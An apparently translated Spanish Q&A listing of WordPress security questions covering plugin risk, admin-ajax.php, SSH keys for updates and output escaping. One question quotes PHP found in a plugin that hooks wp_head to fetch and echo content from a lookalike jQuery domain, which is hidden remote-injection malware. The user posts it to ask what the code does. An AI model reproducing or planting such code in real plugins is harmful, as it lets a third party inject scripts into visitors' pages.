Preguntas etiquetadas con security

Fortalecimiento de temas, complementos e instalación principal para evitar intrusiones.



6
¿Son esenciales los complementos de Wordpress?
Soy nuevo en WordPress. Hace poco leí un artículo sobre cómo los hackers pueden explotar vulnerabilidades en los complementos. Varias fuentes, como Google Pagespeed, también me han disuadido de usar complementos o al menos mantenerlo al mínimo. Personalmente, también trato de evitar los complementos porque me siento más en control …
19 plugins  security 


2
Encontré esto en un complemento. ¿Qué hace? ¿Es peligroso?
Encontré esto en un complemento. ¿Qué hace? ¿Es peligroso? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }






4
¿Cómo funciona admin-ajax.php?
Tenemos algunos problemas con un desarrollador externo. Queremos limitar el acceso al wp-adminsitio solo al acceso interno (a través de VPN ). Simplemente para que no sea atacado por usuarios externos. Podemos enumerar los administradores del sitio y no queremos que sean phishing. Nuestro desarrollador dice que no podemos hacer …
14 admin  ajax  security 


1
¿Por qué WordPress necesita mi clave ssh privada para actualizar?
Configurar WordPress para actualizar dentro de la aplicación (es decir, WordPress) es ideal para mí debido a su conveniencia. Sin embargo, estoy preocupado por los requisitos. Los campos solicitados que aparecen después de instalar ssh2 para php preguntan no solo mi clave pública, sino también mi clave privada. Creo que, …
13 security  updates  ssh 

1
¿Qué tan seguro / desinfectado es wp_insert_posts ()?
Mirando el Codex para wp_insert_post () , establece que esta función "... desinfecta las variables, realiza algunas comprobaciones, completa las variables faltantes como fecha / hora, etc." (EDITAR: Actualicé la entrada del Codex para incluir un ejemplo más robusto que incluye seguridad, así como meta meta y asignación de categoría) …

4
¿Por qué debería usar el esc_url?
Esto dificulta mi codificación. Wordpress codex razona el uso de esc_url al hablar vagamente sobre seguridad. ¿Pero realmente vale la pena? Por ejemplo, ¿cuál es el beneficio de seguridad práctico importante al usar <?php echo esc_url( home_url( '/' ) ); ?> en lugar de <?php echo home_url() ?> PD: No …
12 security 

Al usar nuestro sitio, usted reconoce que ha leído y comprende nuestra Política de Cookies y Política de Privacidad.
Licensed under cc by-sa 3.0 with attribution required.